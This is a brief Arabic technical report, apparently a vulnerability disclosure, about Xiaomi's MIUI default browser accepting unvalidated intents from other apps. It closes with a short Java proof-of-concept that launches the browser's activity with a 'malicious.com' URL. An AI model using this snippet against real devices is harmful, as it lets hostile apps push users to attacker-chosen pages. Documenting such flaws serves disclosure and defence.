
تقرير فني حول ثغرة أمنية حرجة في Xiaomi
تقرير فني عن ثغرة حرجة في Xiaomi
ملخص الثغرة
تم اكتشاف ثغرة في المتصفح الافتراضي لـ Xiaomi (com.android.browser) على العديد من أجهزة MIUI. يفشل التطبيق في التحقق بشكل صحيح من النوايا (intents) التي يتم تمريرها عبر startActivity، مما يسمح للتطبيقات الخبيثة بفتح عناوين URL عشوائية أو تنفيذ إجراءات غير مقصودة.
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);